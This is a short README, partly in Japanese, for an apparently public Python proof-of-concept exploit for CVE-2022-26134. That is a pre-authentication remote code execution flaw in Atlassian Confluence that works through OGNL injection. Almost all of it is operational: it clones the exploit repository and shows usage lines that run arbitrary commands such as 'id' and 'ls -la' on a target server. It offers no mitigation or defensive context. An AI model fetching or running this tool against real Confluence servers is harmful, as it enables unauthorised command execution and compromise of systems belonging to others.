
CVE-2022-26134 用の Python PoC エクスプロイト。Atlassian Confluence の OGNL インジェクションを介した認証前リモートコード実行の脆弱性です。脆弱なサーバー上で任意のコマンドを実行します。
CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL インジェクション
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'